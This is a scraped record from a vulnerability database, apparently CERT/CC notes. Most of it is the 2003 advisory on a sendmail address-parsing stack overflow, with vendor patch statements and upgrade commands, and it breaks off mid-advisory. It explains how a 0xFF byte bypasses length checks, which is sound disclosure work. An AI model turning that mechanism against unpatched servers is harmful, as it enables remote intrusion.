* <http://xforce.iss.net/xforce/xfdb/16412>\n\n### Acknowledgements\n\nThis vulnerability was discovered by Stian Skjelstad. \n\nThis document was written by Jeffrey P. Lanza. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0554](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0554>) \n---|--- \n**Severity Metric:****** | 11.81 \n**Date Public:** | 2004-06-14 \n**Date First Published:** | 2004-06-15 \n**Date Last Updated: ** | 2004-08-23 17:54 UTC \n**Document Revision: ** | 21 \n", "modified": "2004-08-23T17:54:00", "published": "2004-06-15T00:00:00", "id": "VU:973654", "href": "https://www.kb.cert.org/vuls/id/973654", "type": "cert", "title": "Linux kernel fails to properly handle floating point signals generated by \"fsave\" and \"frstor\"", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T20:44:31", "bulletinFamily": "info", "description": "### Overview \n\nSendmail contains a buffer overflow in code that parses email addresses. A remote attacker could execute arbitrary code or cause a denial of service on a vulnerable system.\n\n### Description \n\nSendmail is a widely used mail transfer agent (MTA). There is a stack overflow vulnerability in code that parses email addresses. A remote attacker could exploit this vulnerability with a message containing a specially crafted email address.\n\nWhen processing email messages, sendmail creates tokens from address elements (user, host, domain). The code that performs this function (`prescan()` in `parseaddr.c`) contains logic to check that the tokens are not malformed or overly long. In certain cases, a variable in `prescan()` is set to the special control value -1, which may alter the program logic to skip the length checks. On little-endian platforms that treat the `char` type as `signed int`, the `char` value 0xFF sets the high-order bit, which in terms of a `signed int` indicates a negative value. When `prescan()` treats a `char` with the value 0xFF as an `int`, the value is interpreted as -1, which can cause the length checks to be skipped. Using an email message with a specially crafted address containing 0xFF, an attacker could cause the length checks to be skipped and overwrite the saved instruction pointer on the stack. \n \nFurther information is available in a [message](<http://www.securityfocus.com/archive/1/316773/2003-03-28/2003-04-03/0>) posted by Michal Zalewski. \n \nIn sendmail 8.9.12 and 8.11.7 (and possibly other versions), additional modifications have been made to protect other vulnerable sendmail MTAs. From the [release notes](<http://www.sendmail.org/ftp/RELEASE_NOTES>) for sendmail 8.9.12: \n\n \n \n 8.12.9/8.12.9 2003/03/29 SECURITY: Fix a buffer overflow in address parsing due to a char to int conversion problem which is potentially remotely exploitable. Problem found by Michal Zalewski. Note: an MTA that is not patched might be vulnerable to data that it receives from untrusted sources, which includes DNS. To provide partial protection to internal, unpatched sendmail MTAs, 8.12.9 changes by default (char)0xff to (char)0x7f in headers etc. To turn off this conversion compile with -DALLOW_255 or use the command line option -d82.101. To provide partial protection for internal, unpatched MTAs that may be performing 7->8 or 8->7 bit MIME conversions, the default for MaxMimeHeaderLength has been changed to 2048/1024. Note: this does have a performance impact, and it only protects against frontal attacks from the outside. To disable the checks and return to pre-8.12.9 defaults, set MaxMimeHeaderLength to 0/0.\n\nNote that DNS could also be used as an attack vector. \n \n--- \n \n### Impact \n\nA remote attacker could execute arbitrary code or cause a denial of service on a vulnerable system. \n \n--- \n \n### Solution \n\n**Upgrade or Patch** \nUpgrade or apply a patch as specified by your vendor. In addition to addressing the vulnerability, upgraded versions of sendmail (8.9.12 and 8.11.7) include modifications to help protect other vulnerable sendmail MTAs. \n \n--- \n \n \n**Enable RunAsUser** \n \nConsider setting the RunAsUser option to reduce the impact of this vulnerability. The CERT/CC recommends limiting the privileges of applications and services whenever possible. \n \n--- \n \n### Vendor Information\n\n897604\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Apple Computer Inc.\n\nNotified: March 29, 2003 Updated: September 25, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nApple has released Mac OS X 10.2.5 which includes the patch from the sendmail team for this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [announcement](<http://lists.apple.com/archives/security-announce/2003/Apr/10/applesa20030410macosx102.txt>) for Mac OS X 10.2.5.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Conectiva\n\nNotified: March 29, 2003 Updated: May 20, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nConectiva Linux 6.0, 7.0 and 8 contain sendmail and are vulnerable to this issue, even though sendmail is no longer the default MTA in our distribution. Updated packages will be announced to our mailing lists when ready.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [CLSA-2003:614](<http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000614>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Debian\n\nNotified: March 29, 2003 Updated: April 22, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [DSA-278](<http://www.debian.org/security/2003/dsa-278>) and [DSA-290](<http://www.debian.org/security/2003/dsa-290>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ FreeBSD\n\nNotified: March 29, 2003 Updated: March 31, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [FreeBSD-SA-03:07.sendmail](<ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:07.sendmail.asc>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ Fujitsu\n\nNotified: March 29, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Gentoo Linux\n\nUpdated: April 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- - --------------------------------------------------------------------- \nGENTOO LINUX SECURITY ANNOUNCEMENT 200303-27 \n- - --------------------------------------------------------------------- \n` \n` PACKAGE : sendmail \nSUMMARY : buffer overflow \nDATE : 2003-03-31 09:13 UTC \nEXPLOIT : remote \nVERSIONS AFFECTED : <8.12.9 \nFIXED VERSION : >=8.12.9 \nCVE : CAN-2003-0161 \n` \n`- - --------------------------------------------------------------------- \n` \n`- From advisory: \n\"There is a vulnerability in sendmail that can be exploited to cause \na denial-of-service condition and could allow a remote attacker to \nexecute arbitrary code with the privileges of the sendmail \ndaemon, typically root.\" \n` \n`Read the full advisory at \n<http://www.cert.org/advisories/CA-2003-12.html> \n` \n`SOLUTION \n` \n`It is recommended that all Gentoo Linux users who are running \nnet-mail/sendmail upgrade to sendmail-8.12.9 as follows: \n` \n`emerge sync \nemerge sendmail \nemerge clean \n` \n`- - --------------------------------------------------------------------- \naliz@gentoo.org - GnuPG key is available at <http://cvs.gentoo.org/~aliz> \navenj@gentoo.org \n- - --------------------------------------------------------------------- \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.1 (GNU/Linux) \n` \n`iD8DBQE+iAbNfT7nyhUpoZMRAuQWAJ9DKi8B6JxgHVyxRLZfM1e5N0YyNQCgqM7Y \nNwuiPB4hihTbTLAXIKg9/J8= \n=RiMh \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Hewlett-Packard Company\n\nNotified: March 29, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSOURCE: Hewlett-Packard Company HP Services Software Security Response Team\n\nx-ref: SSRT3531 \n \nAt the time of writing this document, Hewlett Packard is currently investigating the potential impact to HP's released Operating System software products. \n \nAs further information becomes available HP will provide notice of the availability of any necessary patches through standard security bulletin announcements and be available from your normal HP Services support channel.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see HPSBUX0304-253/HPSBMP0304-018/SSRT3531:\n\n \n<<http://ftp.support.compaq.com/patches/.new/unix.shtml>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ IBM\n\nNotified: March 29, 2003 Updated: June 24, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe AIX operating system is vulnerable to sendmail buffer overflow attack mentioned in CERT Advisory CA-2003-12 and CERT Vulnerability Note VU# 897604.\n\nAn efix is available from: \n \n<ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_2_efix.tar.Z> \n \nThe APAR numbers and availability dated for this issue are as follows: \n \nAPAR number for AIX 4.3.3: IY42629 (available approx. 05/07/2003) \nAPAR number for AIX 5.1.0: IY42630 (available approx. 04/28/2003) \nAPAR number for AIX 5.2.0: IY42631 (available approx. 04/28/2003) \nThe APARs can be downloaded using the URL below and then following the links for your AIX release level. \n \n<http://techsupport.services.ibm.com/server/fixes?view=pSeries> \n \nFor more information please contact your AIX Support Center.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nIBM z/OS - OS/390 - MVS systems are also affected (PQ72696):\n\n \n<<http://www-1.ibm.com/services/continuity/recover1.nsf/MSS/MSS-OAR-E01-2003.0793.1>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ MandrakeSoft\n\nNotified: March 29, 2003 Updated: April 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MDKSA-2003:042](<http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:042>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Mirapoint\n\nUpdated: April 22, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nMirapoint has corrected this problem. Details of the update (D3_SMTP_CERT_2003_12) can be found on the [Mirapoint secure support center](<http://support.mirapoint.com/>).\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ NetBSD\n\nNotified: March 29, 2003 Updated: April 22, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [NetBSD-SA2003-009](<ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2003-009.txt.asc>) and the list of [security patches](<http://www.netbsd.org/Security/patches-1.6.html>) included in NetBSD 1.6.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Nortel Networks\n\nNotified: March 29, 2003 Updated: April 08, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe following Nortel Networks Wireless products are potentially affected by the vulnerabilities identified in CERT Advisory CA-2003-12:\n\n * SS7 IP Gateway.\nNortel Networks recommends disabling Sendmail as it is not used.\n * Wireless Preside OAM&P Main Server.\nSendmail should not be disabled on these products. \n \nThe following Nortel Networks Enterprise Voice IVR products are potentially affected by the vulnerabilities identified in CERT Advisory CA-2003-12:\n\n * MPS1000\n * MPS500\n * VPS\n * CTX \nAll the above products deploy Sendmail; it should not be disabled on these products. \n \nFor all of the above products Nortel Networks recommends applying the latest Sun Microsystems patches in accordance with that vendor's recommendations. To avoid applying patches twice, please ensure that the Sun Microsystems patch applied also addresses the vulnerability identified in CERT Advisory CA-2003-07. \n \nThe following Nortel Networks Succession products are potentially affected by the vulnerability identified in CERT Advisory CA-2003-12:\n\n * SSPFS-based CS2000 Management Tools \n * GWC Element Manager and QoS Collector Application (QCA) \n * SAM21 Element Manager \n * Audio Provisioning Server (APS) and APS client GUI \n * UAS Element Manager \n * Succession Media Gateway 9000 Element Manager (Mid-Tier and Server) \n * Network Patch Manager (NPM) \n * Nodes Configuration, Trunk Configuration, Carrier Endpoint\n * Configuration, Lines Configuration (Servord+), Trunk Maintenance Manager, Lines Maintenance Manager, Line Test Manager, V5.2 Configuration and Maintenance, PM Poller, EMS Proxy Services, and Common Application Launch Point\nA product bulletin will be issued shortly. \n \nSendmail has been disabled in SN06 and therefore SN06 is not vulnerable. A patch for SN05 is currently under development that will disable Sendmail in SN05 so that it will not be affected by the vulnerability identified in CERT Advisory CA-2003-12. The availability date for the SN05 patch is still to be determined. \n \nFor more information please contact Nortel at: \nNorth America: 1-800-4NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \n \nContacts for other regions are available at \n<>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ OpenBSD\n\nNotified: March 29, 2003 Updated: April 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n<<http://www.openbsd.org/errata32.html#sendmail2>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ OpenPKG\n\nUpdated: April 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`________________________________________________________________________ \n` \n`OpenPKG Security Advisory The OpenPKG Project \n<http://www.openpkg.org/security.html> <http://www.openpkg.org> \nopenpkg-security@openpkg.org openpkg@openpkg.org \nOpenPKG-SA-SA-2003.027 30-Mar-2003 \n________________________________________________________________________ \n` \n`Package: sendmail \nVulnerability: remote root exploit \nOpenPKG Specific: no \n` \n`Affected Releases: Affected Packages: Corrected Packages: \nOpenPKG CURRENT <= sendmail-8.12.8-20030328 >= sendmail-8.12.9-20030329 \nOpenPKG 1.2 <= sendmail-8.12.7-1.2.1 >= sendmail-8.12.7-1.2.2 \nOpenPKG 1.1 none N.A. \n` \n`Dependent Packages: none \n` \n`Description: \nMichal Zalewski discovered [1] a confirmed [2] buffer overflow \nvulnerability in all version of the Sendmail [0] MTA earlier than \n8.12.9. The mail address parser performs insufficient bounds checking \nin certain conditions due to a \"char\" to \"int\" data type conversion, \nmaking it possible for an attacker to take control of the application. \nAttackers may remotely exploit this vulnerability to gain \"root\" \naccess of any vulnerable Sendmail server. The Common Vulnerabilities \nand Exposures (CVE) project assigned the id CAN-2003-0161 [3] to the \nproblem. \n` \n` Please check whether you are affected by running \"<prefix>/bin/rpm \n-q sendmail\". If you have the \"sendmail\" package installed and its \nversion is affected (see above), we recommend that you immediately \nupgrade it (see Solution). [4][5] \n` \n`Solution: \nSelect the updated source RPM appropriate for your OpenPKG release \n[6], fetch it from the OpenPKG FTP service [7] or a mirror location, \nverify its integrity [8], build a corresponding binary RPM from it [4] \nand update your OpenPKG installation by applying the binary RPM [5]. \nFor the current release OpenPKG 1.2, perform the following operations \nto permanently fix the security problem (for other releases adjust \naccordingly). \n` \n` $ ftp ftp.openpkg.org \nftp> bin \nftp> cd release/1.2/UPD \nftp> get sendmail-8.12.7-1.2.2.src.rpm \nftp> bye \n$ <prefix>/bin/rpm -v --checksig sendmail-8.12.7-1.2.2.src.rpm \n$ <prefix>/bin/rpm --rebuild sendmail-8.12.7-1.2.2.src.rpm \n$ su - \n# <prefix>/bin/rpm -Fvh <prefix>/RPM/PKG/sendmail-8.12.7-1.2.2.*.rpm \n________________________________________________________________________ \n` \n`References: \n[0] <http://www.sendmail.org/> \n[1] <http://lists.netsys.com/pipermail/full-disclosure/2003-March/008973.html> \n[2] <http://www.securityfocus.com/archive/1/316760/2003-03-26/2003-04-01/0> \n[3] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0161> \n[4] <http://www.openpkg.org/tutorial.html#regular-source> \n[5] <http://www.openpkg.org/tutorial.html#regular-binary> \n[6] <ftp://ftp.openpkg.org/release/1.2/UPD/sendmail-8.12.7-1.2.2.src.rpm> \n[7] <ftp://ftp.openpkg.org/release/1.2/UPD/> \n[8] <http://www.openpkg.org/security.html#signature> \n________________________________________________________________________ \n` \n`For security reasons, this advisory was digitally signed with the \nOpenPGP public key \"OpenPKG <openpkg@openpkg.org>\" (ID 63C4CB9F) of the \nOpenPKG project which you can retrieve from <http://pgp.openpkg.org> and \nhkp://pgp.openpkg.org. Follow the instructions on <http://pgp.openpkg.org/> \nfor details on how to verify the integrity of this advisory. \n________________________________________________________________________ \n` \n`-----BEGIN PGP SIGNATURE----- \nComment: OpenPKG <openpkg@openpkg.org> \n` \n`iD8DBQE+huYSgHWT4GPEy58RAhdpAKDGqKOKSGwfuxVT5imK+1H0LBDcPACgu1nq \ncia1t2PI8lNReMIeza3KLKI= \n=38Sm \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Red Hat Inc.\n\nNotified: March 29, 2003 Updated: April 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nRed Hat distributes sendmail in all Red Hat Linux distributions. Updated sendmail packages that contain patches to correct this vulnerability are available along with our advisory at the URLs below. Users of the Red Hat Network can update their systems using the 'up2date' tool.\n\nRed Hat Linux: \n<http://rhn.redhat.com/errata/RHSA-2003-120.html> \nRed Hat Enterprise Linux: \n<http://rhn.redhat.com/errata/RHSA-2003-121.html>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ SCO\n\nNotified: March 29, 2003 Updated: April 07, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [CSSA-2003-016](<ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2003-016.0.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ SGI\n\nNotified: March 29, 2003 Updated: April 07, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSGI acknowledges receiving CERT VU#897604 and is currently investigating. This is being tracked as SGI Bug# 886104. No further information is available at this time.\n\nFor the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported SGI operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list on <http://www.sgi.com/support/security/>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [20030401-01-P](<ftp://patches.sgi.com/support/free/security/advisories/20030401-01-P>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Sendmail Inc.\n\nUpdated: March 29, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nAll commercial releases including Sendmail Switch, Sendmail Advanced Message Server (which includes the Sendmail Switch MTA), Sendmail for NT, and Sendmail Pro are affected by this issue. Patch information is available at <http://www.sendmail.com/security/>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Sequent (IBM)\n\nNotified: March 29, 2003 Updated: April 29, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nFor information please contact IBM Service at 1-800-IBM-SERV.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have received an unconfirmed report that Fast Patch 255773 addresses both VU#897604 and VU#398025 in Sequent (IBM) Dynix.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ Slackware\n\nUpdated: April 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`[slackware-security] Sendmail buffer overflow fixed (NEW) \n` \n`The sendmail packages in Slackware 8.0, 8.1, and 9.0 have been patched \nto fix a security problem. Note that this vulnerablity is NOT the same \none that was announced on March 3rd and requires a new fix. \n` \n`All sites running sendmail should upgrade. \n` \n`More information on the problem can be found here: \n` \n`<http://www.sendmail.org/8.12.9.html> \n` \n`Here are the details from the Slackware 9.0 ChangeLog: \n+--------------------------+ \nSat Mar 29 13:46:36 PST 2003 \npatches/packages/sendmail-8.12.9-i386-1.tgz: Upgraded to sendmail-8.12.9. \nFrom sendmail's RELEASE_NOTES: \n8.12.9/8.12.9 2003/03/29 \nSECURITY: Fix a buffer overflow in address parsing due to \na char to int conversion problem which is potentially \nremotely exploitable. Problem found by Michal Zalewski. \nNote: an MTA that is not patched might be vulnerable to \ndata that it receives from untrusted sources, which \nincludes DNS. \n(* Security fix *) \npatches/packages/sendmail-cf-8.12.9-noarch-1.tgz: Updated config files for \nsendmail-8.12.9. \n+--------------------------+ \n` \n \n \n`WHERE TO FIND THE NEW PACKAGES: \n+-----------------------------+ \n` \n`Updated packages for Slackware 8.0: \n<ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/packages/sendmail.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-8.0/patches/packages/smailcfg.tgz> \n` \n`Updated packages for Slackware 8.1: \n<ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/sendmail-8.12.9-i386-1.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/sendmail-cf-8.12.9-noarch-1.tgz> \n` \n`Updated packages for Slackware 9.0: \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/sendmail-8.12.9-i386-1.tgz> \n<ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/sendmail-cf-8.12.9-noarch-1.tgz> \n` \n \n \n`MD5 SIGNATURES: \n+-------------+ \n` \n`Here are the md5sums for the packages: \n` \n`Slackware 8.0 packages: \nc29c3063313534bee8db13c5afcd1abc sendmail.tgz \n1b3be9b45f0d078e1053b80069538ca7 smailcfg.tgz \n` \n`Slackware 8.1 packages: \nb1b538ae7685ce8a09514b51f8802614 sendmail-8.12.9-i386-1.tgz \n628b61a20f4529b514060620e5e601e7 sendmail-cf-8.12.9-noarch-1.tgz \n` \n`Slackware 9.0 packages: \n5f4f92f933961b6e652d294cd76da426 sendmail-8.12.9-i386-1.tgz \n45b217e09d5ff2d0e1b7b12a389c86ec sendmail-cf-8.12.9-noarch-1.tgz \n` \n \n \n`INSTALLATION INSTRUCTIONS: \n+------------------------+ \n` \n`First (as root), stop sendmail: \n` \n`. /etc/rc.d/rc.sendmail stop \n` \n`Next, upgrade the sendmail package(s) with upgradepkg: \n` \n`upgradepkg sendmail-*.tgz \n` \n`Finally, restart sendmail: \n` \n`. /etc/rc.d/rc.sendmail start \n` \n \n \n`+-----+ \n` \n`Slackware Linux Security Team \n<http://slackware.com/gpg-key> \nsecurity@slackware.com \n` \n`+------------------------------------------------------------------------+ \n| HOW TO REMOVE YOURSELF FROM THIS MAILING LIST: | \n+------------------------------------------------------------------------+ \n| Send an email to majordomo@slackware.com with this text in the body of | \n| the email message: | \n| | \n| unsubscribe slackware-security | \n| | \n| You will get a confirmation message back. Follow the instructions to | \n| complete the unsubscription. Do not reply to this message to | \n| unsubscribe! | \n+------------------------------------------------------------------------+ \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.1 (GNU/Linux) \n` \n`iD8DBQE+hi4iakRjwEAQIjMRAlYYAJ0SkisbelIwisnAjLcmCBaQC728LACgiu/Q \nftW/49T80bCUapwtL/VzTd4= \n=yPYH \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23897604 Feedback>).\n\n### __ __ SuSE Inc.\n\nNotified: March 29, 2003 Updated: April 01, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE-----`\n\n`______________________________________________________________________________` \n \n` SuSE Security Announcement` \n \n` Package: sendmail, sendmail-tls` \n` Announcement-ID: SuSE-SA:2003:023` \n` Date: Tuesday, April 1st 2003 18:45 MEST` \n` Affected products: 7.1, 7.2, 7.3, 8.0, 8.1, 8.2` \n` SuSE Linux Database Server,` \n` SuSE Linux Enterprise Server 7, 8` \n` SuSE Linux Firewall on CD/Admin host` \n` SuSE Linux Connectivity Server` \n` SuSE Linux Office Server` \n` Vulnerability Type: local/remote privilege escalation` \n` Severity (1-10): 7` \n` SuSE default package: yes (until SuSE Linux 8.0 and SLES7)` \n` Cross References: ``<http://www.cert.org/advisories/CA-2003-12.html>` \n \n` Content of this advisory:` \n` 1) security vulnerability resolved: sendmail, sendmail-tls` \n` problem description, discussion, solution and upgrade information` \n` 2) pending vulnerabilities, solutions, workarounds:` \n` - glibc` \n` - vnc` \n` - openssl` \n` 3) standard appendix (further information)` \n \n`______________________________________________________________________________` \n \n`1) problem description, brief discussion, solution, upgrade information` \n \n` sendmail is the most widely used mail transport agent (MTA) in the` \n` internet. A remotely exploitable buffer overflow has been found in all` \n` versions of sendmail that come with SuSE products. These versions include` \n` sendmail-8.11 and sendmail-8.12 releases. sendmail is the MTA subsystem` \n` that is installed by default on all SuSE products up to and including` \n` SuSE Linux 8.0 and the SuSE Linux Enterprise Server 7.` \n \n` The vulnerability was discovered by Michal Zalewski. It is not related` \n` to the vulnerability found by ISS in the first week of March as announced` \n` by SuSE Security in SuSE Security Announcement SuSE-SA:2003:013 (CERT` \n` Announcement ID CA-2003-07). The impact is believed to be a local root` \n` compromise with the possibility of a remote compromise. Even though` \n` the remote nature of the vulnerability is not confirmed, we believe that` \n` it is safe to assume that the vulnerability may be remotely exploitable.` \n` The nature of the flaw is a stack overflow in a function that is called` \n` frequently throughout the sendmail source code. The function is used for` \n` processing email addresses.` \n \n` There is no known workaround for this vulnerability other than using a` \n` different MTA. The vulnerability is triggered by an email message sent` \n` through the sendmail MTA subsystem. In that respect, it is different` \n` from commonly known bugs that occur in the context of an open TCP` \n` connection. By consequence, the vulnerability also exists if email` \n` messages get forwarded over a relay that itself does not run a vulnerable` \n` MTA. This specific detail and the wide distribution of sendmail in the` \n` internet causes this vulnerability to be considered a flaw of major` \n` severity. We recommend to install the update packages that are provided` \n` for download at the locations listed below.` \n \n` Please download the update package for your distribution and verify its` \n` integrity by the methods listed in section 3) of this announcement.` \n` Then, install the package using the command \"rpm -Fhv file.rpm\" to apply` \n` the update.` \n` Our maintenance customers are being notified individually. The packages` \n` are being offered to install from the maintenance web.` \n \n` SPECIAL INSTALL INSTRUCTIONS:` \n` ==============================` \n` After performing the update, it is necessary to restart all running` \n` instances of sendmail using the command \"rcsendmail restart\" as root.` \n \n \n` Intel i386 Platform:` \n \n` SuSE-8.1:` \n` ``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-109.i586.rpm>` \n` bb987c277374db2cf5ec81b7abe9a476` \n` patch rpm(s):` \n` 